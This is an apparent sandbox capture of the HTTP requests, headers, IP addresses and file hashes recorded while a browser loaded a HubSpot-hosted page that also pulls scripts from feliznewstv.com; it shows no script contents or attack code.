Sha256: d19cd994105a0d58d42125024879d444797c935ccdbc763957bc033ca6f5b555
                                        
GET /26246913.js HTTP/1.1
Host: js-eu1.hs-scripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
172.65.208.22
HTTP/1.1 200 OK
Content-Type: application/javascript;charset=utf-8
Date: Wed, 14 Sep 2022 10:25:59 GMT
Content-Length: 603
Connection: keep-alive
X-Trace: 2B911C44FDC4D8DE4B89196FE47126FCE0FEEBF9F1000000000000000000
Cache-Control: public, max-age=30
Vary: Accept-Encoding
X-HubSpot-Correlation-Id: 560ea103-afee-4fea-8d8f-2e5ad1c2ba77
Content-Encoding: gzip
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 3600
Access-Control-Allow-Origin: http://appnewstv.hs-sites-eu1.com
Last-Modified: Wed, 14 Sep 2022 07:44:13 GMT
CF-Cache-Status: EXPIRED
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 74a86bf96f75b4f4-OSL


--- Additional Info ---
Magic:  ASCII text, with very long lines (546)
Size:   603
Md5:    52c4889fe72e3ec52d4cb3917b4ed58d
Sha1:   34ce208a60c6af7280c925df6ef34a91dfeca1e5
Sha256: ffcb11e1ebc9b4538cf20471d8add627bbbf754e2ee158f7b7c49ef3ad423f42
                                        
GET /cms-free-branding-lib/static-1.111/js/index.js HTTP/1.1
Host: static.hsappstatic.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
date: Wed, 14 Sep 2022 10:25:59 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 12 Jul 2022 20:24:02 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: UeMu8WOMDUthADLLgqZZZU3H9mISgOsX
etag: W/"29a15a515ef5e383fba2c6d65b1de499"
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 60d22b5ab79521d827fcdd546c7710d4.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: -KuTJcFYSjo9F4GglqsT_-vXHaNSY_Z_DAQD2EJCoeEMmw1nPJ3ipg==
cf-cache-status: HIT
age: 1425801
expires: Thu, 14 Sep 2023 10:25:59 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ar6utrnujoinpFNKDpTPlEASaHHV6DBTgxVcxiucpuBu%2FQoC6bv%2B5GsjK5J5q4jpmVySQ0Y3YKCgHzv3RYAd%2Bd3tXhrjC1fKBkmhPgVdqe9FbVP%2Fi9TtrikzLpKeEjhtbL7poPp67P8%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74a86bf96c02b50c-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (64286), with no line terminators
Size:   49864
Md5:    ba991217faf06639f02d84fb9032747c
Sha1:   256fba261c1656ac538f0bf7c19c424a764311f1
Sha256: d014f303203a7d12d14f8115a376f10d4358476cb1d97b1a865f7208261c6153
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 6iXLLqp98SfLNgBmoHNGrw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         52.39.126.109
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: zJNqC5dCWpCEdGIvMcfOgMO1mjM=

                                        
                                            GET /hubfs/26246913/raw_assets/public/@marketplace/GiantFocal/Hatch_Landing/images/placeholder/image-02.jpg HTTP/1.1 
Host: 26246913.fs1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: image/jpeg
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Content-Length: 208912
Connection: keep-alive
CF-Ray: 74a86bfa9b9eb515-OSL
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
ETag: "576c8bc261d879e5c7095993fa055911"
Last-Modified: Tue, 13 Sep 2022 13:51:23 GMT
Vary: Accept-Encoding
Via: 1.1 0562d7d213bde9a129ec458c631f9cee.cloudfront.net (CloudFront)
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
Cf-Bgj: imgq:85,h2pri
Cf-Polished: origSize=208920, status=webp_bigger
Edge-Cache-Tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
X-Amz-Cf-Id: mDqyHtOHIzO_qgXXNEX-kYj5maCnodTPy9QRW6ADQTUyaGlKDTWddA==
X-Amz-Cf-Pop: CPH50-C1
x-amz-id-2: TMJLjSWFnpVNG6PErGDCY637rzVM01XSn7rIc6Xcw3emZCzjMmwjLLRpKyERLTnoGPJwt4jJQ7o=
x-amz-meta-cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
x-amz-meta-created-unix-time-millis: 1663077082549
x-amz-meta-index-tag: none
x-amz-replication-status: COMPLETED
x-amz-request-id: HW3RG1JQ5A158BX7
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: a0xWrfJ3xzhrq6qQxYKJrHAsTUBXaOuy
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
X-Robots-Tag: none
Server: cloudflare


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1441, components 3\012- data
Size:   208912
Md5:    bfdc57caf64cf284e867df913fe185da
Sha1:   f7dcd78a87b1e123f9a2f9f55ec1d589c872768b
Sha256: f5e6d7ccd952d26615cf449d6548878465e7297a09175a9054ce2f53ba7d20fc
                                        
                                            GET /hubfs/26246913/raw_assets/public/@marketplace/GiantFocal/Hatch_Landing/images/placeholder/hatch-landing.svg HTTP/1.1 
Host: 26246913.fs1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: image/svg+xml
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bfa9b82b51b-OSL
Access-Control-Allow-Origin: *
Cache-Control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
ETag: W/"af286b492412cf0f1308aa1ee9407d83"
Last-Modified: Tue, 13 Sep 2022 13:51:23 GMT
Vary: Accept-Encoding
Via: 1.1 1624c79cd07e6098196697a6a7907e4a.cloudfront.net (CloudFront)
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
cache-tag: F-53071101646,FD-53071101644,P-26246913,FLS-ALL
Edge-Cache-Tag: F-53071101646,FD-53071101644,P-26246913,FLS-ALL
X-Amz-Cf-Id: SFfzADrJGoX-6VPMScrsvAJrkheJzEV5R5G4GBBMX14M51F-UpOwug==
X-Amz-Cf-Pop: CPH50-C1
x-amz-id-2: IAMS5JkvpWrEj/pdqkEOErIhzvmkI5EgCb5bSmdcIKbZ28jw0593LrIH9v7JNuZLbsEoOwZCpcM=
x-amz-meta-cache-tag: F-53071101646,FD-53071101644,P-26246913,FLS-ALL
x-amz-meta-created-unix-time-millis: 1663077082624
x-amz-meta-index-tag: none
x-amz-replication-status: COMPLETED
x-amz-request-id: HW3SFNJBC9K6YTBH
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: KID.skCzBK4TAd09TQ13YVDwgvEZqKoh
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
X-Robots-Tag: none
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (693)
Size:   1506
Md5:    b115ac3b89c0aee15fefc9d2a8175a2e
Sha1:   1593ab592da720765b4ca2f7a80ed2dd6fe80322
Sha256: 24af5a3bb49b0cecbd9f8fb1817f62c5bc9c7e326d9950fb0fe40b44cee51756
                                        
                                            GET /cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.17.6.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 11:25:59 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H%2BiaoGxsG7tYvNU%2FhOo7IlKXDJyYQTZWwEDr7ZCGwrToRsqGyvgzUzLIXCkc08mq5pInDHF5lovDDDiIdNSj4ppMcvWtSAMnYkVBjqhopYElNZ9ONepkc3hffZ2AkiEoY%2FsW0nmxefo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74a86bfadf541c0e-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            GET /cms-free-branding-lib/static-1.111/assets/sprocket_white.svg HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.17.6.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 11:25:59 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/assets/sprocket_white.svg
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fd2U0qAqUZ4AEE%2FM4SC51FQiEHnQ0W8M2a5nZbvpFIUiNbTJVfXZ019yEcZ0L%2BvYX9VrVVEDLCp6X8jbRGb58EUMaRiSjoNtaOfPerdECeN4DFEvLr3Hqu8j1zf3wk3Elr972YDSwpw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74a86bfaeb10b50f-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15744
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Sep 2022 19:34:08 GMT
expires: Thu, 07 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 571911
last-modified: Wed, 11 May 2022 19:24:48 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15744, version 1.0\012- data
Size:   15744
Md5:    15d9f621c3bd1599f0169dcf0bd5e63e
Sha1:   7ca9c5967f3bb8bffeab24b639b49c1e7d03fa52
Sha256: f6734f8177112c0839b961f96d813fcb189d81b60e96c33278c1983b6f419615
                                        
                                            GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15860
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Sep 2022 19:34:08 GMT
expires: Thu, 07 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 571911
last-modified: Wed, 11 May 2022 19:24:42 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15860, version 1.0\012- data
Size:   15860
Md5:    e9f5aaf547f165386cd313b995dddd8e
Sha1:   acdef5603c2387b0e5bffd744b679a24a8bc1968
Sha256: f5aebdfea35d1e7656ef4acc5db1f243209755ae3300943ef8fc6280f363c860
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "09A40458A8D09F4A00A80574A0D404CB719DBC66709FDFF0E426035C6CEDC4F1"
Last-Modified: Wed, 14 Sep 2022 04:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21536
Expires: Wed, 14 Sep 2022 16:24:55 GMT
Date: Wed, 14 Sep 2022 10:25:59 GMT
Connection: keep-alive

                                        
                                            GET /?api=1&lan=twthk&ht=2&counter0=josvip222 HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7f3ik2irke4cqqn48tflqkb25u; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (63717), with CRLF line terminators
Size:   512224
Md5:    9bba01d1d9085b86dc859903c9996c66
Sha1:   5ee01822118fcbed4f406e2273b10d1d607046ef
Sha256: bac95180b9d023e31413d3c4fe1722de075dcbd9c063d2e9a6f35eadce592b06
                                        
                                            GET /location HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx
Date: Wed, 14 Sep 2022 10:26:00 GMT
Content-Length: 241
Connection: keep-alive
Location: https://feliznewstv.com/location/


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   241
Md5:    2d26acd39ecd1a69f0d4019746bac7da
Sha1:   5996b124ec05053dd8708e453f78a78f0256ffb6
Sha256: 08664eb7296f9bf300c88e3b1d63eb282481a8bd4e9105b4f6b7756be3316a20
                                        
                                            GET /location/ HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 10:26:00 GMT
Content-Length: 468
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   468
Md5:    6f1497d5364a6cfda0e81dd10d409ebf
Sha1:   4db66111b55d4b33203ba3a888e12ba6163cdfdf
Sha256: 3cf8f3dd6ae89d4970edad8007c999d712327c53c1da0998db6f32c7ad99c4e2
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
                                            GET /collectedforms.js HTTP/1.1 
Host: js-eu1.hscollectedforms.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.192.122
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 10:26:00 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Tue, 13 Sep 2022 10:41:10 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 5afLcxIjU5LfvvyyfvxzjsWXufXHSL1t
etag: W/"7a468b833be86c01bc8dfd455308f792"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 507b5edb20d0e1a0b73c8687f53defa8.cloudfront.net (CloudFront)
x-amz-cf-pop: FRA6-C1
x-amz-cf-id: 4x15r2QQ2poDiSr4Je3RAtQzJ4Vy6FcuxkEt7Yfp8x95RIzj5HGquw==
cache-control: s-maxage=86400, max-age=0
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://exceptions.hubspot.com/csp/report?resource=collected-forms-embed-js/static-1.292/bundles/project.js&cfRay=74a506dec96b9930-FRA
x-hs-target-asset: collected-forms-embed-js/static-1.292/bundles/project.js
x-hs-cache-status: MISS
cache-tag: staticjsapp-collected-forms-embed-js-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 35600
server: cloudflare
cf-ray: 74a86c016b1a991a-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
Size:   23141
Md5:    4546e06e9f5d50e4b68720b04beece10
Sha1:   e8c1b145bafd2a258b8a7fbc87c01daa2190dcdd
Sha256: 6ee778726169e6ff1a5f2d443db925c7bd862b41c97873569e05ce8eb2d14c78
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
